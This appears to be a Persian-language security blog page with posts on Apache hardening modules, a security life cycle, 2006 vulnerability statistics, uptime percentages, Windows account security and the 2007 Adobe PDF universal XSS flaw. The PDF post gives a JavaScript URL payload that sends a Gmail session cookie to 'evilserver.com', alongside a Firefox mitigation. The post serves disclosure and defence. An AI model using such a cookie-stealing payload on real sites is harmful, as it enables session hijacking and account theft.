محافظت از وب سرور آپاچی



وب
سرور آپاچی به عنوان پراستفاده ترین وب سرور اینترنت (که
البته این محبوبیت در حال کاهش است
!) دارای تهدید هایی است که به رعایت برخی
نکات و استفاده از ابزارهای موجود می توان این تهدید ها را کاهش داد. قسمتی از این
تهدید ها را در مقاله

Protect your Apache server from DoS attacks
می توانید بخوانید. در ادامه چند
مطلب در مورد پیشگیری و محافظت در برابر حملات بر ضد
Apache
را می توانید دنبال کنید.


Mitigate Attacks With
mod_evasive

Now that you have a tuned,
well-trafficked site, what should you think about next? High on your list
should be security. Hopefully, you’ve adopted the best practices for locking
down your Apache and PHP installations, but beyond that, there are many
Apache modules that can further bolster a hardened configuration and
therefore increase uptime. One module that comes to mind is mod_security, an
embeddable Web application firewall. Another is mod_evasive. Available from

http://www.zdziarski.com/projects/mod_evasive/
and licensed under the
GNU Public License, mod_evasive is an Apache module that provides evasive
action in the event of an HTTP denial of service (DoS), distributed denial
of service (DDoS), or brute force attack. mod_evasive is also designed to be
a detection and network management tool, and can be easily configured to
talk to ipchains, firewalls, and routers. Moreover, it can report abuses via
email and syslog.


SNIPS (System & Network
Integrated Polling Software)
is a system and network monitoring
software that runs on Unix systems and can monitor network and system
devices. It is capable of monitoring DNS, NTP, TCP or web ports, host
performance, syslogs, radius servers, BGP peers, etc. New monitors can be
added easily (via a C or Perl API).

     –
20 ways to Secure your Apache
Configuration


Securing Apache:
Step-by-Step

Before we start securing Apache, we must
specify what functionality we expect from the server. Variety of Apache’s
use makes it difficult to write a universal procedure to secure the server
in every case. That’s why in this article we’ll base on the following
functionality:

* The Web server will be accessible from the Internet; and,
* Only static HTML pages will be served
* the server will support name-based virtual hosting mechanism
* specified Web pages can be accessible only from selected IP addresses or
users (basic authentication)
* the server will log all the Web requests (including information about Web
browsers)


Securing Apache 2:
Step-by-Step

When choosing a web server, Apache very
often wins against its competitors because of stability, performance, that
fact that it’s open source, and many other advantages. But when deciding on
which version of Apache to use, the choice is not always so simple. On the
one hand there is a very popular, stable version used by millions of users,
version 1.3, and on the other hand, there is an enhanced and re-designed
version 2.0.


Secure Your Apache
With mod_security

This article shows how to install and
configure mod_security. mod_security is an Apache module (for Apache 1 and
2) that provides intrusion detection and prevention for web applications. It
aims at shielding web applications from known and unknown attacks, such as
SQL injection attacks, cross-site scripting, path traversal attacks, etc.

In the first chapter I will show how to install mod_security on Debian Sarge,
Ubuntu 6.06 LTS (Dapper Drake), and on Fedora Core 5, and in the second
chapter I will describe how to configure Apache for mod_security which is
independent from the distribution you’re using.

چرخه حیات امنیت


چرخه حیات امنیت
(
Security Life Cycle) دارای نسخه ها و تعاریف مختلفی است،
که در نهایت هدف هر کدام نگهداری وضعیت امنیتی یک سیستم (این سیستم می تواند یک
سازمان، یک شبکه یا یک برنامه یکپارچه باشد.) در حالت مطلوب و آماده است. معروفترین
نوع چرخه حیات امنیت
(
SLC) که به طور کلی هر سیستمی را می تواند شامل شود،
شامل این 4 وضعیت است:

   
1-ارزیابی
    2-طراحی
    3-به کارگیری و پیاده سازی
    4-نگهداری

همانطور که
پیشتر ذکر شد، این چرخه امنیتی برای هر سیستمی قابل تعریف است، این سیستم می تواند
یک شبکه، یک مرکز داده و یا یک سازمان باشد. در اینجا به صورت مختصر، هر کدام از
این وضعیت ها را برای یک مرکز داده بررسی می کنیم. در این حالت اعضای این چرخه
امنیتی، شامل بستر اصلی شبکه، سرورها و رویه های کاری خواهند بود.

جریان
SLC یک پروسه ادامه دار و زنده است، در هر مرحله وضعیت کنونی و هدف
می بایست به صورت کامل مستندسازی شود و تمامی مستندات قابل اندازه گیری و مقایسه
پذیر ( ابعاد متریک و کمی) باشند. در هر مرحله، با استفاده از مقایسه هایی که انجام
خواهد شد، میزان پیشرفت و بهبود سیستم قابل گزارش خواهد بود.

1-ارزیابی:
پروسه ممیزی، بازرسی، آزمایش و رسیدگی به آسیب پذیری ها از طریق تحلیل ریسک ها را
ارزیابی می گوییم. خروجی فاز ارزیابی، فهرستی از اجزای حیاتی سیستم و وضعیت ریسک
فعلی آسیب پذیری های شناخته شده و فهرست آن ها خواهد بود که به عنوان منبع اطلاعاتی
برای فاز طراحی مورد استفاده قرار خواهد گرفت. در یک مرکز داده، اجزای حیاتی شامل
سرورهایی با حساسیت بالا و بستر پشتیبان این سرور ها (شامل سوییچ ها، روترها،
فایروال
ها…) می باشد. آسیب پذیری های اصلی آن هایی خواهند بود که به این اجزای
حیاتی می توانند آسیب برسانند. برخی اوقات برای اطمینان از صحت و دقت اطلاعات،
ارزیابی شامل بررسی و آزمایش قسمت های مختلف سیستم خواهد بود. این بررسی ها
می‌تواند شامل

تست نفوذپذیری
سیستم باشد.

2-طراحی:
پروسه به کارگیری سیاست نامه های امنیتی و رعایت نیازهای امنیتی مشخص شده در فاز
ارزیابی، به عنوان فاز طراحی امنیتی مطرح می‌شود. در این مرحله، برای رعایت توسعه
پذیری و مدیریت آسان تر سیستم، طراحی بر اساس یک فریم ورک توصیه می شود. این قالب
طراحی، می تواند از نوع آماده و یا تجربی باشد. در طراحی
مراکز داده،
استفاده از طراحی ماجولار بهترین روش برای دسته بندی امکانات و پاسخ گویی به نیازها
است.

3-به کارگیری
و پیاده سازی
:عبارت است از پیاده سازی خروجی های فاز طراحی بر اساس نیازهای
مطرح شده و همچنین با توجه ویژه به ساختار اصلی شبکه. در این مرحله، یکپارچه سازی
سیاست نامه های امنیتی تهیه شده با امکانات و نیازهای موجود از حساسیت ویژه ای
برخوردار است. پیاده سازی زمانی قابل استفاده خواهد بود که تمامی اجزای مرکز داده
به درستی با یکدیگر ارتباط برقرار کنند.

4-نگهداری:
پروسه نگهداری برنامه ها، شبکه و رویه های کاری بر اساس سیاست نامه های
امنیتی تهیه شده، با استفاده از

مانیتورینگ کل اجزای مرکز داده
بر اساس توصیه نامه ها و استانداردهای موجود
تنها راه تضمین حیات و پایداری کسب و کار در دراز مدت است. بهترین طراحی ها و دقیق
ترین پیاده سازی ها بدون استفاده از نگهداری صحیح در طول زمان با مشکلاتی مواجه
خواهند شد
.

تست نفوذپذیری و B-2 Spirit


قسمت
های مختلف وب سایت در حال آماده شدن هستند. سعی می کنم در حد توانم، استانداردهای
طراحی را رعایت کنم، تطبیق امکانات

وب2
را تا حد امکان فراهم کنم و یک وب سایت SEO
دوست!!! داشته باشم.

در این بین انتخاب اجزای مناسب به عنوان نماد، فعالیت
جالبی است، و در آخرین نمونه بمب افکن
B-2 Spirit
را برای قسمت

خدمات تست نفوذپذیری
انتخاب کردم.

هواپیماهای جنگی خانواده Stealth
که

Spirit
یکی از مدرن ترین های این مجموعه است، شباهت بسیار زیادی به رویه
های تست نفوذپذیری دارند.

ابزارهای امنیتی Secure2S



بخش

ابزارهای امنیتی Secure2S
، قسمتی از این وب سایت است
که به جمع آوری ابزارهای امنیت شبکه و امنیت سیستم ها از منابع مختلف و با اعتبار
پرداخته است. حساسیت روزافزون حفظ پایداری و امنیت سیستم های مختلف و پیشرفت روزمره
ابزارهای آزمایشی و تخریبی دلیل اصلی راه اندازی این قسمت بوده است. منابع اصلی که
محتوای این بخش را تامین می کند در ابتدا دو وب سایت
Top 100 Network Security Tools
و

BackTrack Tools
می باشد و سپس
لیست های پستی مختلفی که در زمینه
امنیت شبکه
وجود دارد. در قسمت دسته بندی ها می توانید ابزارهای مختلفی که در
هر مورد وجود دارد را مرور کنید و اگر در این مورد نظری دارید، حتما آن را در میان
بگذارید.

آمار گرایشات امنیتی در سال 2006

از وقتی که شرکت IBM در نیمه چهارم سال 2006 گروه ISS رو تصاحب کرد، مدت زیادی نمی گذرد. در این مدت، ISS همانند آبی بزرگ، گزارش های جالبی منتشر می کند. در یکی از این گزارش ها با عنوان آمار گرایشات امنیتی در سال 2006، یک جمع بندی کلی از تمامی موارد با اهمیت حوزه امنیت اطلاعات انجام شده است. از آنجا که نقل این گزارش، با توجه به وجود نسخه اصلی گزارش بی ارزش است، فقط به قسمتی از آن اشاره می کنم. همانطور که در نمودار زیر مشاهده می کنید، آسیب پذیری هایی با ریسک بالا در حال کاهش، و آسیب پذیری های عمومی در حال افزایش هستند. سهم آسیب پذیری هایی با ریسک پایین هم تقریبا ثابت مانده است. به نظر من، یکی از علت هایی که برای این روند رشد می توان بیان کرد، افزایش اهمیت در حوزه تجارت های بزرگ و تاثیرات آن بر آسیب پذیری هایی با ریسک بالا است. ثابت ماندن آسیب پذیری های ریسک پایین، به علت وجود ثابت توسعه دهنده های بی توجه به موارد امنیتی و بالا رفتن آسیب پذیری های عمومی به علت افزایش توسعه برنامه ها به سمت Web Application ها است. در اصل گزارش می توانید رشد قابل ملاحظه آسیب پذیری های Remote را مشاهده کنید.

در جدول زیر هم سهم 10 تولید کننده برتر از آسیب پذیری ها در سال 2006 را می توانید مشاهده کنید.

Vendor

Vulnerable % of 2006

Microsoft Corporation

3.1 %

Oracle Corporation

2.1 %

Apple Computer Inc

1.9 %

Mozila Corporation

1.4 %

IBM

1.2 %

Linux Kernel Organization Inc

1.2 %

Sun Microsystems Inc

1.0 %

Cisco Systems Inc

0.9 %

Hewlette-Packard

0.6 %

Adobe Systems Inc

0.4 %

IBM Internet Security Systems X-Force 2006 Trend Statistics

میزان دسترسی

طراحی سیستم ها با مشخص کردن یک مقیاس به عنوان معیار قابل دسترس بودن (درصد میزان دسترسی)، به صورت واقعی تا حدودی مشکل (غیر ممکن) است. وجود پارامترهای مختلفی که در سرویس دهی سیستم ها (چه سیستم های شبکه ای، چه سیستم های نرم افزاری) وجود دارند و غیر قابل کنترل بودن بعضی از این پارامتر ها از جمله مواردی است که باعث مشکل بودن این کار می شود. از مجموع 8760 ساعتی که در سال وجود دارد، بسته به حساسیت، اهمیت و حیاتی بودن سیستم، محدوده Uptime مشخصی برای سرویس دهی می بایست مورد هدف قرار بگیرد. جدولی برای این محدوده را که در حالت معمول تعداد 9ها (Nines) آن را مشخص می کند، می تواند مشاهده کنید. (برای تفریح > Uptime-Project)

میزان دسترسی % Downtime در سال Downtime در ماه Downtime  در هفته
90% 36.5 days 73 hours 16.84 hours
95% 18.25 days 36.5 hours 8.42 hours
98% 7.30 days 14.4 hours 3.36 hours
99% 3.65 days 7.20 hours 1.68 hours
99.5% 1.83 days 3.60 hours 50.4 min
99.9% 8.76 hours 43.2 min 10.1 min
99.99% 52.6 min 4.32 min 1.01 min
99.999% 5.26 min 25.9 s 6.05 s
99.9999% 31.5 s 2.59 s 0.605 s

آسیب پذیری XSS در نمایش فایل های PDF

شروع سال 2007 همراه با خبرهای جالبی در دنیای امنیت کامپیوتری بود. تابستان امسال، ماه ایرادهای مرورگرها بود. پاییز ماه ایراد کرنل و این بار نوبت به Mac OS X رسیده است. آخرین نمونه از این خبرهای جالب آسیب پذیری در نمایش فایل های PDF است. این آسیب پذیری جدید و خطرناک امکان اجرای کدهای جاوا اسکریپت بر روی کامپیوتر شما بدون هیچ محدودیتی فراهم می کند. قالب کلی روش اجرای چنین کدی برای یک فایل PDF در یک وب سرور به این صورت است :

http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here

برای یک مثال واقعی، می توانید پس از وارد شدن به حساب Google/Gmail خود از آدرس زیر بازدید کنید:

http://mail.google.com/mail/help/docs/
Gmail_shortcuts.pdf#blah=javascript:alert(document.cookie);

آنچه خروجی این آدرس خواهد بود، برابر document.cookie حساب Gmail شما است، که برابر با session جاری شما خواهد بود. این session را می توان با هدایت به یک اسکریپت دزدید و در این صورت حساب شما مورد تهدید قرار خواهد گرفت. نمونه خطرناکتر آدرس بالا را می توان این گونه بیان کرد:

http://mail.google.com/mail/help/docs/Gmail_shortcuts.pdf#blah=javascript:
document.location=’http://evilserver.com/capturecookie.cgi?cookie=’+
document.cookie;

این سناریو، تنها نمونه ای است، که آسیب پذیری جدید نمایش فایل های PDF می تواند برای شما ایجاد کند. این نقص، به این صورت عمل می کند که فایل های PDF بدون هیچ دلیلی توانایی اجرای کدهای جاوا اسکریپت را دارا هستند. نکته قابل تامل در این نقص، این است که هیچ نیازی به وجود دسرسی ویژه ای برای آن فایل وجود ندارد و ابزار لازم برای شروع یک حمله، تنها وجود یک فایل PDF بر روی یک وب سرور است. با توجه به نوع این نقص امکان فیلتر کردن آن بر روی برنامه های وب سرور تقریبا وجود ندارد. اگر از مرورگر فایرفاکس استفاده می کنید، در حال حاضر سریعترین روش برای جلوگیری از بروز تهدید، غیرفعال کردن نمایش فایل های PDF در مرورگر است. به این روش این کار را می توانید انجام دهید :

Firefox->Tools->Options->Content->Manage->change PDF action to “Save todisk”.

برای اطلاعات بیشتر در این مورد می توانید به نوشته Adobe Acrobat JavaScript Execution Bug is a Huge Security Issue مراجعه کنید. شروع اصلی بحث در لیست webappsec همچنان در حال ادامه است. مراجعه کنید به Universal XSS with PDF files: highly dangerous برای دیدن نظرات مختلف در این مورد. نوشته GNUCITIZEN در این مورد | نوشته ha.ckers در مورد PDF XSS

امنیت کاربران و کلمه های عبور در ویندوز

ابزار ها و برنامه های مختلفی برای دور زدن و یا غیر فعال کردن پسورد یا کلمه عبور برای سیستم های مبتنی بر ویندوز وجود دارد.ابزار های مختلفی که با استفاده از قدرت راهبری لینوکس پارامترهای حیاتی ویندوز را تغییر می دهند و تمامی زحمات برای داشتن یک سیستم امن را از بین می برند.

همیشه جمله ای در ذهنم است که خیلی تلاش ها و حرف ها را بی معنی می کند ،این جمله Security is a myth که به فارسی خودمان می شود امنیت افسانه ای بیش نیست اما این دلیلی برای رسیدن به این افسانه برای من و شما نیست.

همگی می دانیم سیستمی که با آن دسترسی فیزیکی وجود داشته باشد حتما راهی برای ورود به آن است ، این راه بسته به تلاش مدیر آن سیستم می تواند آسان و یا پیچیده باشد.من یا شما وظیفه داریم هر چقدر می توانیم این راه را برای سیستم هایی که تحت پوشش ما می باشد را پیچیده کنیم.

راهنما ها و مقالات متعددی در این زمینه – user account policies – وجود دارد که نمونه زیر از نمونه های خوب آن می باشد.ترجیح دادم به جای ترجمه مقاله آن را معرفی کنم و این مقدمه را برای آن بنویسم ،راه های مختلفی مانند تغییر دادن نام Administrator و ایجاد یک کاربر پوچ به همین نام و تغییر دادن پارمترهای policy سیستم روش هایی هستند که پیشنهاد شده اند.

پیشنهاد می کنم مقاله را کامل و در کمال آرامش بخوانید ، حتما مفید خواهد بود.

Securing your Windows 2000, XP, and 2003 User Accounts and Passwords